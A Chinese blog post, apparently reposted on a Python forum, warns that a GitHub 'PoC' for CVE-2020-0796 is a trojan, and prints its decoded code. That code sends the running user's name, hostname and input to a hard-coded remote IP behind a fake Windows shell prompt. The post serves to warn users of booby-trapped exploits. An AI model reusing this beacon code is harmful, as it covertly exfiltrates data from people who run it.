Py学习  »  Git

你还敢用github上的PoC么?

黑白之道 • 4 年前 • 652 次点击  


文章来源:白袍的小行星

下午的时候,我突然看到了朋友在群里发了个东西,大意是他看到了github上出了CVE-2020-0796的PoC,但是发现有问题。


就是这位:



四天前注册,一发一堆让人眼馋的Poc,嗯。。。


点进去看代码,主要的篇幅都用在shellcode上了:



转码之后,我们拿到了代码:


  1. time.sleep(3)

  2. lhost = os.uname()[1]

  3. command = getpass.getuser() + '@' + (lhost)

  4. args = ' '.join(sys.argv[1:])

  5. ErrorMsg = 'Connection Terminated: (Timeout)'

  6. URL = base64. b64decode('aHR0cDovLzU0LjE4NC4yMC42OS9wb2MyLnBocA==')

  7. PARAMS = {'host':command, 'args':args, 'cve':Bug}

  8. r = requests.get(url = URL, params = PARAMS)

  9. welcome = r.content

  10. if welcome != "":

  11. rsp = 1

  12. while rsp != "":

  13. cmd = raw_input(welcome)

  14. PARAMS = {'host':command, 'args':cmd, 'cve':Bug}

  15. r = requests.get(url = URL, params = PARAMS)

  16. rsp = r.content

  17. print rsp

  18. welcome = "C:\WINDOWS\system32>"

  19. time.sleep(10)


你发现了什么?那段被base64编码的URL是这个:


  1. http://54.184.20.69/poc2.php


精不精彩?刺不刺激?



你还敢直接用github上的POC吗?


感谢群里的渗透实力担当乔乔和无声双螺旋小灰(rainismG)师傅。


全文完。


推荐文章++++

*Github出现大规模网络劫持情况

*Thinkphp V5.X 远程代码执行漏洞-POC 集合

*迟到的儿童节礼物—BlueKeep漏洞POC恐怖来袭


Python社区是高质量的Python/Django开发社区
本文地址:http://www.python88.com/topic/62160
 
652 次点击